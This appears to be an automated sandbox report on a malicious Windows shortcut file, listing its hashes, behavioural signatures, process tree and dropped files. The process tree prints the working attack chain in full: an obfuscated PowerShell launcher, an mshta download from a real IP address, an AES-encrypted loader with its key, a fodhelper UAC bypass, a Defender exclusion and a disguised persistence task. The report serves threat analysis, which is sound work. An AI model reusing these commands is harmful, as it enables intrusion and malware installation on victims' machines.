Overview

overview

10

Static

static

1

043ecf8511...52.lnk

windows7-x64

3

043ecf8511...52.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    141s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13/02/2024, 02:30

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    043ecf851126758e1c385c7996da325b7c10d45a4c0d56a165a91adc50a8b952.lnk

  • Size

    338KB

  • MD5

    aa17c1186359a1ff75f4c53531de4b40

  • SHA1

    726d59562bf9c5530706337181c995aa7aa7df56

  • SHA256

    043ecf851126758e1c385c7996da325b7c10d45a4c0d56a165a91adc50a8b952

  • SHA512

    27b6b98863ffb086a5712f1f3055373e0107f4062084850563ca3cc1f08df836f1a01f29696a4f1c8a7c38a4118c9c7a99b91afb7fa255bd89e6ec446f062c25

  • SSDEEP

    24:82/ByKnC+/lZnY7t9LQluwN0v+6ezliqYnWcAarab/B4f:8KPnZY78ZemrMqeA4abBC

Score
10/10
evasiontrojan

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.92.248.36/Downloads/config.exe

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 46 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\043ecf851126758e1c385c7996da325b7c10d45a4c0d56a165a91adc50a8b952.lnk
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2668
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\System32\SyncAppvPublishingServer.vbs" ;565,571,560,572,553,488,560,572,572,568,514,503,503,513,505,502,513,506,502,506,508,512,502,507,510,503,524,567,575,566,564,567,553,556,571,503,555,567,566,558,561,559,502,557,576,557|%{$n+=[char]($_-456)};$n | powershell -
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2468
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer ;565,571,560,572,553,488,560,572,572,568,514,503,503,513,505,502,513,506,502,506,508,512,502,507,510,503,524,567,575,566,564,567,553,556,571,503,555,567,566,558,561,559,502,557,576,557|%{$n+=[char]($_-456)};$n | powershell -}
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3824
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1480
          • C:\Windows\system32\mshta.exe
            "C:\Windows\system32\mshta.exe" http://91.92.248.36/Downloads/config.exe
            5⤵
            • Blocklisted process makes network request
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:3304
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $wauLzkw = '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';$OgScJgJi = 'SkpHRVl2TnV5dFNtYW5DdHVYbGRPQk5QandWRlpOU0o=';$BwerIjm = New-Object 'System.Security.Cryptography.AesManaged';$BwerIjm.Mode = [System.Security.Cryptography.CipherMode]::ECB;$BwerIjm.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$BwerIjm.BlockSize = 128;$BwerIjm.KeySize = 256;$BwerIjm.Key = [System.Convert]::FromBase64String($OgScJgJi);$FfImT = [System.Convert]::FromBase64String($wauLzkw);$dpHrhAbw = $FfImT[0..15];$BwerIjm.IV = $dpHrhAbw;$VveFZCBje = $BwerIjm.CreateDecryptor();$qFKMUzafD = $VveFZCBje.TransformFinalBlock($FfImT, 16, $FfImT.Length - 16);$BwerIjm.Dispose();$FDICvmkx = New-Object System.IO.MemoryStream( , $qFKMUzafD );$hebjfzMz = New-Object System.IO.MemoryStream;$bIJBQdkJw = New-Object System.IO.Compression.GzipStream $FDICvmkx, ([IO.Compression.CompressionMode]::Decompress);$bIJBQdkJw.CopyTo( $hebjfzMz );$bIJBQdkJw.Close();$FDICvmkx.Close();[byte[]] $BDYZJphM = $hebjfzMz.ToArray();$eYTnUe = [System.Text.Encoding]::UTF8.GetString($BDYZJphM);$eYTnUe | powershell -
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4284
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
                7⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1084
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2348
                  • C:\Windows\system32\reg.exe
                    REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\Admin\AppData\Local\Temp\r.bat" /F
                    9⤵
                    • Modifies registry class
                    PID:4420
                  • C:\Windows\system32\reg.exe
                    REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
                    9⤵
                    • Modifies registry class
                    PID:4604
                  • C:\Windows\system32\fodhelper.exe
                    FoDHelper.exe
                    9⤵
                    • Modifies registry class
                    • Suspicious use of WriteProcessMemory
                    PID:4044
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\r.bat" "
                      10⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2820
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\r.bat"
                        11⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1196
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -w 1 -ep Unrestricted -nop Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming;
                          12⤵
                          • UAC bypass
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3012
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3312
                  • C:\Windows\system32\reg.exe
                    REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
                    9⤵
                    • Modifies registry class
                    PID:2720
                  • C:\Windows\system32\reg.exe
                    REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
                    9⤵
                    • Modifies registry class
                    PID:5040
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:956
                  • C:\Windows\system32\reg.exe
                    REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\Admin\AppData\Local\Temp\r.bat" /F
                    9⤵
                    • Modifies registry class
                    PID:2856
                  • C:\Windows\system32\reg.exe
                    REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
                    9⤵
                    • Modifies registry class
                    PID:1528
                  • C:\Windows\system32\fodhelper.exe
                    FoDHelper.exe
                    9⤵
                    • Modifies registry class
                    • Suspicious use of WriteProcessMemory
                    PID:452
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\r.bat" "
                      10⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4940
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\r.bat"
                        11⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2404
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -w 1 -ep Unrestricted -nop schtasks.exe /TN MicrosoftEdgeUpdateTaskMachine /CREATE /F /TR C:\Users\Admin\AppData\Roaming\tiago.exe /SC ONLOGON
                          12⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3388
                          • C:\Windows\system32\schtasks.exe
                            "C:\Windows\system32\schtasks.exe" /TN MicrosoftEdgeUpdateTaskMachine /CREATE /F /TR C:\Users\Admin\AppData\Roaming\tiago.exe /SC ONLOGON
                            13⤵
                            • Creates scheduled task(s)
                            PID:3268
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3508
                  • C:\Windows\system32\reg.exe
                    REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
                    9⤵
                    • Modifies registry class
                    PID:4668
                  • C:\Windows\system32\reg.exe
                    REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
                    9⤵
                    • Modifies registry class
                    PID:2460
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4636
                  • C:\Windows\system32\reg.exe
                    REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\Admin\AppData\Local\Temp\r.bat" /F
                    9⤵
                    • Modifies registry class
                    PID:1044
                  • C:\Windows\system32\reg.exe
                    REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
                    9⤵
                    • Modifies registry class
                    PID:1608
                  • C:\Windows\system32\fodhelper.exe
                    FoDHelper.exe
                    9⤵
                    • Modifies registry class
                    • Suspicious use of WriteProcessMemory
                    PID:2360
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\r.bat" "
                      10⤵
                        PID:1772
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\r.bat"
                          11⤵
                            PID:4472
                            • C:\Users\Admin\AppData\Roaming\tiago.exe
                              C:\Users\Admin\AppData\Roaming\tiago.exe
                              12⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              PID:1588
                              • C:\Users\Admin\AppData\Roaming\tiago.exe
                                C:\Users\Admin\AppData\Roaming\tiago.exe
                                13⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3516
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
                      8⤵
                        PID:2064
                        • C:\Windows\system32\reg.exe
                          REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
                          9⤵
                          • Modifies registry class
                          PID:4452
                        • C:\Windows\system32\reg.exe
                          REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
                          9⤵
                          • Modifies registry class
                          PID:4204

        Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                Filesize

                2KB

                MD5

                d85ba6ff808d9e5444a4b369f5bc2730

                SHA1

                31aa9d96590fff6981b315e0b391b575e4c0804a

                SHA256

                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                SHA512

                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                Filesize

                64B

                MD5

                446dd1cf97eaba21cf14d03aebc79f27

                SHA1

                36e4cc7367e0c7b40f4a8ace272941ea46373799

                SHA256

                a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                SHA512

                a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                1KB

                MD5

                f91538602e9ff576a1da8c1f0da256e2

                SHA1

                03767455a68800dc942a2e6c2215a41f88053cbc

                SHA256

                4a9c70703015a228bded6112d473442ede8d5d68f756685d04732ce313d46853

                SHA512

                584cb4758828466ef360018cfedace73e929de4da9355585939cd2909d021480968b0380008ddf46326d2d386691133f2a7cb4ba5b3c665b17d19f0483537373

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                1KB

                MD5

                cdfcd69eff1d2cedc7c97eee8643dbc2

                SHA1

                58da1a3de57a7498e55616e8b113df9eba105f3a

                SHA256

                967c7d706cab1deea45b4a525faa97f2d1ab7db2c1465856938450776e0dfe58

                SHA512

                d2b62d6879fc0fa106c86a2bedef4caf47f68a41f7060a73ea40bbe472cdb8f247db01265eb311e883f491ddf189de8c9a115d52a8c7ca38ee5efdf2687ec040

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                1KB

                MD5

                6fe90f28ba1b43849008cccb44ebdd6e

                SHA1

                aef93f46446f611fc8714efd2ce94907a1238975

                SHA256

                a2c69924d5bd8f11404c2f56fe1d3f656ba3bfb6c1f3ca223f21498b74ddca97

                SHA512

                f095467847e0f0e56e2d50b33ab2e979aafbee92449eafdeb66c10c147d331e9dce172e7e81124c30d0185b5625b06887de851f2aeec5e2d703eaf1a864eb798

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j4ie2x0o.b3z.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\r.bat
                Filesize

                147B

                MD5

                3f46500c62390375952919974961cde9

                SHA1

                304cffd5642073f6739759e1fb69bd0134ef174e

                SHA256

                36e4e0d31b2919eb834e914f6a20f2b1712fd000ce7b61adc68b4b682a967805

                SHA512

                28918397df5f900214a3bcaddc7e0aa30bbad712bde5edddc89cae0e8e5c8002822791cf73eed837775837bd7b0748292ef5673bc7ce5e9ebdc6b87a6da74247

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\r.bat
                Filesize

                360B

                MD5

                e2b2e599d70d6fc8b5cafc627355d1a0

                SHA1

                cf6e53269301edab9bdb6e1c712804b61d290f77

                SHA256

                3a5120a60bd357c8424d794406d2349969d9382240ddad1b31c9eb7254606c3f

                SHA512

                d68d4a0225bcd08bd58dfce56be5e49929e160314e6155509ce081e9dcae6e155d91d0c7556740787bc0903ee41c0f31baa2a93d2c290aac0edf20909e6691b6

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\r.bat
                Filesize

                264B

                MD5

                676b5f856c87e67d7415b31374d062d7

                SHA1

                76e42d132f4069284f4b98c55c37639c3992f35a

                SHA256

                25be22616ba9c65573a98415aa36feb8b1e45df39d11cd22c602c55f1a172e4b

                SHA512

                8056e016226d3b4c05315454c96a1c79730d03a8a2255579bc8a791b40913c7d309b22a6db56dced6ead1539fd9968ba0de41d382ab778d4d8ec37511f774255

                Download Submit

              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                Filesize

                6KB

                MD5

                c0aa0180b78fe2543f51930f6403c58b

                SHA1

                e7999f4288adb803a3546be2a92255cd6cb0e899

                SHA256

                641dcf7417b1e696934795655763c35edf6fbc9433e26e3b642d729c769a470a

                SHA512

                aba518f2cfe7373fea39c925f72b153d24512902df4764b9e428066465367c899056eee4fb965b7cd2489568072306bf5aaf5aeab0175b203dbdd37b50c4119c

                Download Submit

              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                Filesize

                6KB

                MD5

                91179b36c8204bfe7caaea940a0b8e3d

                SHA1

                97f7d99b64221749324e28ea502d2e0573ce692d

                SHA256

                602ca4117468ca45e51f1b4181c338991313b2658433c0547aa15bea398b49f4

                SHA512

                b21db39be59cde270871117930ad1b3f88fef8ec3eaa985ec230ce7462fa20f40e433569b2eaf7bd6a4456a54c170b36b8d4602524f101aa49f976321197a60e

                Download Submit

              • C:\Users\Admin\AppData\Roaming\tiago.exe
                Filesize

                8.8MB

                MD5

                6f44bf0ddb55e5ca2743d13e33796482

                SHA1

                b2ffae5aa7f47eab56d659ee668fffc66fca8fdd

                SHA256

                2abc99536dfaddee6da828980199699715482174b648205b2e429b3c871ec21a

                SHA512

                4f42f0bb399e760c2fcd897569f9bb9772db315c4ca7352056cada38e5257883b39dd975e6ee0b6da8bab6850b44f235215ada703b01a1ddf94b36ef03d2ec74

                Download Submit

              • C:\Users\Admin\AppData\Roaming\tiago.exe
                Filesize

                7.2MB

                MD5

                9bd7e4a8ac457615006c95c4aeac5a96

                SHA1

                be54b071905ca9ea0a0764c661afcfe6fa4ce1a3

                SHA256

                5c3b44cac0cedc69d853d473df6ef8cdb7b7b4aa56dfc0ed40d0d035c7ef010b

                SHA512

                680ac788cef34f3cc33df4de5d4992ad3be87c19d4eeb91d72d5e3e43a7214817189ff652aa2ba3b5b226c28c2797223cc2126a470090458500b83ce81c25b40

                Download Submit

              • C:\Users\Admin\AppData\Roaming\tiago.exe
                Filesize

                10.9MB

                MD5

                41b99b0770f01afbd80481fb6f811bcc

                SHA1

                58ee2fb1672b3af2db7997bb91cf3ab138d801e1

                SHA256

                d457b15dfcdd6669d60af6d96f56757674b6f0fbba11999f76f47e03bd635d09

                SHA512

                f9642a06e797992423b3d93785d175b081637b691c41d3f4a35dfd2860aa83cb967c4ceeace86a61e524f1ef674d1af1fab1de8e82ca45b11254cb666b78b08e

                Download Submit

              • memory/1084-59-0x00007FF876580000-0x00007FF877041000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/1084-109-0x00007FF876580000-0x00007FF877041000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/1084-112-0x00000214CE900000-0x00000214CE910000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1084-60-0x00000214CE900000-0x00000214CE910000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1084-61-0x00000214CE900000-0x00000214CE910000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1084-110-0x00000214CE900000-0x00000214CE910000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1084-122-0x00007FF876580000-0x00007FF877041000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/1084-111-0x00000214CE900000-0x00000214CE910000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1480-32-0x00007FF877AD0000-0x00007FF878591000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/1480-20-0x00000252E3A00000-0x00000252E3A10000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1480-19-0x00000252E3A00000-0x00000252E3A10000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1480-18-0x00007FF877AD0000-0x00007FF878591000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/3012-77-0x00007FF876580000-0x00007FF877041000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/3012-78-0x0000016AA9530000-0x0000016AA9540000-memory.dmp

                Filesize

                64KB

                Download

              • memory/3012-80-0x00007FF876580000-0x00007FF877041000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/3388-93-0x0000011DE7BC0000-0x0000011DE7BD0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/3388-107-0x00007FF876580000-0x00007FF877041000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/3388-92-0x00007FF876580000-0x00007FF877041000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/3824-14-0x000001E0A7140000-0x000001E0A7150000-memory.dmp

                Filesize

                64KB

                Download

              • memory/3824-11-0x000001E0A7140000-0x000001E0A7150000-memory.dmp

                Filesize

                64KB

                Download

              • memory/3824-9-0x000001E0A7B00000-0x000001E0A7B22000-memory.dmp

                Filesize

                136KB

                Download

              • memory/3824-10-0x00007FF877AD0000-0x00007FF878591000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/3824-12-0x000001E0A7140000-0x000001E0A7150000-memory.dmp

                Filesize

                64KB

                Download

              • memory/3824-13-0x000001E0A7140000-0x000001E0A7150000-memory.dmp

                Filesize

                64KB

                Download

              • memory/3824-35-0x00007FF877AD0000-0x00007FF878591000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/3824-17-0x000001E0A7DD0000-0x000001E0A7DEC000-memory.dmp

                Filesize

                112KB

                Download

              • memory/3824-16-0x00007FF871630000-0x00007FF8716E5000-memory.dmp

                Filesize

                724KB

                Download

              • memory/3824-15-0x000001E0A8050000-0x000001E0A8105000-memory.dmp

                Filesize

                724KB

                Download

              • memory/4284-86-0x00007FF876580000-0x00007FF877041000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/4284-108-0x000001F4B9930000-0x000001F4B9940000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4284-48-0x000001F4B9930000-0x000001F4B9940000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4284-99-0x000001F4B9930000-0x000001F4B9940000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4284-105-0x000001F4B9930000-0x000001F4B9940000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4284-47-0x00007FF876580000-0x00007FF877041000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/4284-125-0x00007FF876580000-0x00007FF877041000-memory.dmp

                Filesize

                10.8MB

                Download